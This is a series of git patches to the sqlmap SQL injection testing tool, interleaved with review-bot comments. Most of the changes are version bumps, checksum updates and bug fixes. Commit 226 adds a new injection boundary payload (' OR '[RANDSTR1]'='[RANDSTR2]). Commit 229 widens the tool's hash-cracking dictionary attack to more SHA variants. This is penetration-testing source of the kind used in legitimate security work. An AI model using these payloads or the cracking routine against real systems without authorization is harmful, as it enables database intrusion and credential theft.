@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -63ca523cd15143c4c0dc1ee2d307dfa6 lib/core/settings.py +d4884a7b0a93931bc37783e62162d8bb lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py From 9e002028232949eb6044ee55d367707e40d099eb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 9 Aug 2018 15:39:37 +0200 Subject: [PATCH 224/428] Minor patch (use redirection code for comparison) --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7e0ec6ca79e..781a72dcccc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.2" +VERSION = "1.2.8.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 612970b4899..5a3a267d9c3 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -490,7 +490,7 @@ class _(dict): page = Connect._connReadProxy(conn) if not skipRead else None if conn: - code = conn.code + code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes) responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fe043b2641c..587d73a15a4 100644 
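Review bot: The new assignment of `code` packs a three-way decision into one conditional expression with a trailing comment, which is hard to read and to verify, and it relies on `code` already being bound before this point, which is outside the hunk. The same behaviour reads more plainly as a guard: `if conn.code != kb.originalCode or not code:` / `    code = conn.code  # keep an earlier redirection code for comparison purposes`. That form preserves the fallback to `conn.code` when the earlier `code` is falsy.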
--- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d4884a7b0a93931bc37783e62162d8bb lib/core/settings.py +a56c2a90533ae494cd72e817d84a6c46 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -70,7 +70,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -039f0f7cf997856fa2f6e8d5d69f7ae9 lib/request/connect.py +e284905d23658b85e94a5dd37bfb80b2 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 75a64245c5e49d2d3d7524436772d65f04437237 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 9 Aug 2018 16:21:04 +0200 Subject: [PATCH 225/428] Minor patch for colorization (multiple quoted strings in same line) --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 20 ++++++++++---------- txt/checksum.md5 | 6 +++--- 3 files changed, 14 insertions(+), 14 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 781a72dcccc..d219d4a8b20 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.3" +VERSION = "1.2.8.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 346e0d3cb3d..1b91ccaab4b 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -181,16 +181,16 @@ def colorize(self, message, levelno): reset = self.reset message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) - match = re.search(r"'([^']+)'", message) # single-quoted - if level != "PAYLOAD" and match: - string = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace(string, ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) + if level != "PAYLOAD": + for match in re.finditer(r"'([^']+)'", message): # single-quoted + string = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace(string, ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 587d73a15a4..c8d6f4583bd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
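Review bot: Inside the new `for match in re.finditer(...)` loop the replacement is still keyed on the bare `string` with count 1, so when the same text also occurs earlier in the message outside quotes (or is a substring of an earlier quoted string), the escape sequence is inserted at that earlier position instead of around the matched quoted string. Anchoring the replacement on the quoted form avoids this: `message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1)`. The `reset` selection is recomputed against the already-rewritten `message` on every iteration, which is presumably intended but worth a one-line comment. `colorize` starts and ends outside the hunk.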
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a56c2a90533ae494cd72e817d84a6c46 lib/core/settings.py +9253fffb810752d130525dde8668c06a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -285,7 +285,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py de532c4e3160039335010c499129d54f tamper/xforwardedfor.py -b25b47ddeeb62e5857fd5ad17fd454b5 thirdparty/ansistrm/ansistrm.py +3f6a3d322a4629d5bbd93f43ff8e59cc thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py @@ -467,7 +467,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -201b8bb7888f500294a9831bb47ce7a7 xml/boundaries.xml +6debc049a8049b890ca109a731c60782 xml/boundaries.xml 0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml From ad11749b15c2b2d145e554a31c871a0d60be4142 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 9 Aug 2018 16:21:35 +0200 Subject: [PATCH 226/428] One more payload (requires usage of --code or similar) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- xml/boundaries.xml | 10 ++++++++++ 3 files changed, 12 insertions(+), 2 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index d219d4a8b20..9ea537e004b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.4" +VERSION = "1.2.8.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c8d6f4583bd..a1e6367038c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9253fffb810752d130525dde8668c06a lib/core/settings.py +569498929d03e722dbfefaf65c387006 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 497edda8677..b61dcb6e0f2 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -310,6 +310,16 @@ Formats: # [RANDSTR] + + + + 3 + 1 + 1,2 + 2 + ' + OR '[RANDSTR1]'='[RANDSTR2] + From a296d22195709659bcae5a7ca9c126e2d5cbb833 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 10 Aug 2018 14:01:55 +0200 Subject: [PATCH 227/428] Fixes #3205 --- lib/controller/checks.py | 4 +++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 047c77a05a3..074437fce88 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
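Review bot: The new boundary entry (prefix `'`, suffix ` OR '[RANDSTR1]'='[RANDSTR2]`) only works with a response-code based comparison according to the commit title, but nothing in the file records that requirement; the element markup is not fully visible in this rendering, so I am inferring the layout. An XML comment placed directly before the entry, e.g. `<!-- requires usage of --code (or similar) for result comparison -->`, keeps the constraint next to the payload. The settings.py and checksum hunks are a version bump and a checksum update.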
@@ -13,6 +13,7 @@ import re import socket import subprocess +import sys import tempfile import time @@ -90,6 +91,7 @@ from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import UPPER_RATIO_BOUND from lib.core.threads import getCurrentThreadData @@ -761,7 +763,7 @@ def genCmpPayload(): infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert logger.info(infoMsg) - process = subprocess.Popen(conf.alert, shell=True) + process = subprocess.Popen(conf.alert.encode(sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True) process.wait() kb.alerted = True diff --git a/lib/core/settings.py b/lib/core/settings.py index 9ea537e004b..ffce4051c6f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.5" +VERSION = "1.2.8.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a1e6367038c..4673e63ee7f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
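Review bot: `conf.alert.encode(...)` assumes `conf.alert` is a `unicode` object; on Python 2 (this series uses `except X, ex` syntax) calling `.encode()` on a byte `str` that contains non-ASCII bytes first decodes it as ASCII and raises `UnicodeDecodeError`, so the fix for #3205 would fail for exactly that kind of input. Whether the alerting command is always unicode here depends on option parsing outside the hunk. A guard keeps both cases working: `alert = conf.alert.encode(sys.getfilesystemencoding() or UNICODE_ENCODING) if isinstance(conf.alert, unicode) else conf.alert` / `process = subprocess.Popen(alert, shell=True)`. The status from `process.wait()` is still discarded; logging a non-zero exit status would let users notice a broken alert command. The enclosing function starts and ends outside the hunk.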
@@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -94872ce72dc2628cdedf2eb82cba716e lib/controller/checks.py +bc3800ec099df253968b3a7fc1ffce44 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -569498929d03e722dbfefaf65c387006 lib/core/settings.py +a4ded87968a06825056f25955c009db6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py From 2e017eee9989c2932a8baff3fa23a93e8ea16936 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 10 Aug 2018 14:16:27 +0200 Subject: [PATCH 228/428] Fixes #3203 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index ffce4051c6f..54f12963cd7 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.6" +VERSION = "1.2.8.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/core/target.py b/lib/core/target.py index bceafe5c86c..43e153e1e01 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -674,7 +674,7 @@ def _createTargetDirs(): conf.outputPath = getUnicode(conf.outputPath) try: - with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: + with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f: f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4673e63ee7f..e9894a3076b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,10 +48,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a4ded87968a06825056f25955c009db6 lib/core/settings.py +0a3b05220e19a5d4d0b1fe1fc1295c79 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py +5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From b899ab9eb369a7698d542e2f96248d596b7df320 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 13 Aug 2018 15:27:08 +0200 Subject: [PATCH 229/428] Bug fix (sha-256,sha384... were recognized, though, not cracked) --- lib/core/settings.py | 2 +- lib/utils/hash.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 54f12963cd7..b7226f9468b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
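Review bot: `openFile(..., "w+")` carries over the read/write mode from the old `codecs.open` call, but the block only writes, so `"w"` is the mode that matches the use; whether `openFile` accepts `"w+"` and which encoding it applies cannot be seen here, as its definition and import are outside the hunk. The three `f.write` calls record the URL and the full command line from `sys.argv` into `target.txt`, so any credentials passed as command-line options end up on disk in the output directory; a comment such as `# NOTE: the full command line (including any credentials given as options) is persisted here` would make that visible to users and reviewers. `_createTargetDirs` continues outside the hunk.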
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.7" +VERSION = "1.2.8.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index f92f19bd038..4b4e194fb2c 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -903,7 +903,7 @@ def dictionaryAttack(attack_dict): if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): item = [(user, hash_.decode("base64").encode("hex")), {}] - elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.APACHE_SHA1): + elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): item = [(user, hash_), {}] elif hash_regex in (HASH.SSHA,): item = [(user, hash_), {"salt": hash_.decode("base64")[20:]}] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e9894a3076b..b44034b11e6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0a3b05220e19a5d4d0b1fe1fc1295c79 lib/core/settings.py +588c1f076627097ed858094309961af9 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py 
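Review bot: The `elif` tuple in `dictionaryAttack` now lists nine `HASH` members on one line and will grow with each further generic variant; a named module constant (something like `_UNSALTED_HASH_TYPES = (HASH.MYSQL, ..., HASH.APACHE_SHA1)`) with a comment saying these types take the hash value as-is with no salt would make the next addition a one-line change and document why this branch differs from the base64 and SSHA branches around it. Whether the cracking routines used later in `dictionaryAttack` actually handle SHA-224 and SHA-384 is outside the hunk and is not exercised by this change.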
@@ -107,7 +107,7 @@ de9620f03231d8329ee8434884b6bacd lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -4d5b2262ad495301706a4cf4c565abec lib/utils/hash.py +05dbc49838ca0454ce401ad616acf8c5 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From 03e4741a6913e6ebbfc7674dbbe708813bc2d0df Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 17 Aug 2018 19:45:34 +0200 Subject: [PATCH 230/428] Trivial patch (display of used user queries) --- lib/core/settings.py | 2 +- plugins/generic/custom.py | 1 + txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b7226f9468b..7c500c5a9cb 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.8" +VERSION = "1.2.8.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py index b314410db3a..599b2ccf448 100644 --- a/plugins/generic/custom.py +++ b/plugins/generic/custom.py @@ -88,6 +88,7 @@ def sqlShell(self): try: query = raw_input("sql-shell> ") query = getUnicode(query, encoding=sys.stdin.encoding) + query = query.strip("; ") except KeyboardInterrupt: print errMsg = "user aborted" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b44034b11e6..280ca85e139 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
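Review bot: `query.strip("; ")` takes a set of characters, not the two-character string, so it removes any run of `;` and spaces from both ends of the query; that is presumably the intent (drop a trailing statement terminator) but it reads like a literal strip, and a comment prevents the next reader from "fixing" it: `# drop surrounding whitespace and statement terminators (strip() takes a character set)`. What happens with a query that becomes empty after stripping is decided by code outside the hunk; `sqlShell` starts and ends outside it.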
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -588c1f076627097ed858094309961af9 lib/core/settings.py +2f3aba628e9e54988d510c5c1930e77a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -204,7 +204,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py -e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py +ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py From 6d28ca1f933804610f795f17afe629f9f95735f7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 18 Aug 2018 00:02:39 +0200 Subject: [PATCH 231/428] Bug fix (single-quoted strings in long results caused line breaks) --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7c500c5a9cb..2c700e8e72f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.9" +VERSION = "1.2.8.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 1b91ccaab4b..7dc46b68e76 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -190,7 +190,7 @@ def colorize(self, message, levelno): reset = self.reset + self.bold else: reset = self.reset - message = message.replace(string, ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 280ca85e139..9ca0b4f3300 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2f3aba628e9e54988d510c5c1930e77a lib/core/settings.py +4a7ac205b72dafaf6c89cc4a0a8459f4 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py 
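Review bot: Anchoring the replacement on `"'%s'" % string` fixes the mis-placed escape sequence, but the reason is not recorded in the code; a short comment above the line, `# replace the quoted form so an earlier unquoted occurrence of the same text is left alone`, would stop a later cleanup from reverting to the bare `string`. The `reset` variable is still chosen by inspecting the partially rewritten `message`, which this commit leaves unchanged; `colorize` starts and ends outside the hunk.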
@@ -285,7 +285,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py de532c4e3160039335010c499129d54f tamper/xforwardedfor.py -3f6a3d322a4629d5bbd93f43ff8e59cc thirdparty/ansistrm/ansistrm.py +c03de596a9090650c83e8ef722b82833 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From e51db6b355b0dbb227198c71121084089d360a3b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 20 Aug 2018 19:33:19 +0200 Subject: [PATCH 232/428] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f1e5198d968..0a724d40710 100644 --- a/README.md +++ b/README.md 
@@ -1,6 +1,6 @@ # sqlmap -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing 